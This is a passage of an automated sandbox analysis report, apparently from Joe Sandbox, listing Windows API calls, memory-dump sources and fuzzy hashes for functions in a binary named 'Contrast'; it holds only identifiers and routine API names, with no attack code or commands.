                                                                                                                                        • API ID: Message_doexit
                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                        • Opcode ID: e7ce3a5a3760b5c45a0525f9a7613e6ca28f2f38667a58f1c5bf5ff22b7db002
                                                                                                                                        • Instruction ID: f33b141f531c0cbcc9bf2e94dc5898852e87a5455a1e716ac55d22601f36079c
                                                                                                                                        • Opcode Fuzzy Hash: e7ce3a5a3760b5c45a0525f9a7613e6ca28f2f38667a58f1c5bf5ff22b7db002
                                                                                                                                        • Instruction Fuzzy Hash: 3BD05B313C535836D21932E86C1FFDA7F48AF46B55F04442AFB08A61C389D5999041D5
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00550091
                                                                                                                                          • Part of subcall function 0058C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0055027A,?), ref: 0058C6E7
                                                                                                                                          • Part of subcall function 0058C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C6F9
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00550289
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                        • String ID: WIN_XPe
                                                                                                                                        • API String ID: 582185067-3257408948
                                                                                                                                        • Opcode ID: 59709ce920e34ddc720f0ac2dad180197c23744264175de85afeb935ca367d32
                                                                                                                                        • Instruction ID: 2debc8015904a3b8750be67c103316e272b1c033807373b9647e90264b89ff96
                                                                                                                                        • Opcode Fuzzy Hash: 59709ce920e34ddc720f0ac2dad180197c23744264175de85afeb935ca367d32
                                                                                                                                        • Instruction Fuzzy Hash: D7F01C70805109DFCF55DB55C9587EC7FB8BB48301F542886E506A20E0CB714E88DF20
                                                                                                                                        APIs
                                                                                                                                        • DestroyIcon.USER32(,z]0z],005D7A2C,005D7890,?,00525A53,005D7A2C,005D7A30,?,00000004), ref: 00525823
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyIcon
                                                                                                                                        • String ID: ,z]0z]$SZR,z]0z]
                                                                                                                                        • API String ID: 1234817797-3034943861
                                                                                                                                        • Opcode ID: 9fd3f7461e0316a75c7bcee8e67970d9149e658035df18f4e6bc93e1e9161e89
                                                                                                                                        • Instruction ID: ddac7eb01083ffe0f3a531c0dfc16bf56613a83662acd23568ee607f365aac58
                                                                                                                                        • Opcode Fuzzy Hash: 9fd3f7461e0316a75c7bcee8e67970d9149e658035df18f4e6bc93e1e9161e89
                                                                                                                                        • Instruction Fuzzy Hash: 30E0C232014216EBE7200F08E8007A4FFE8FF22321F34C416E08056090E3F168A0DB90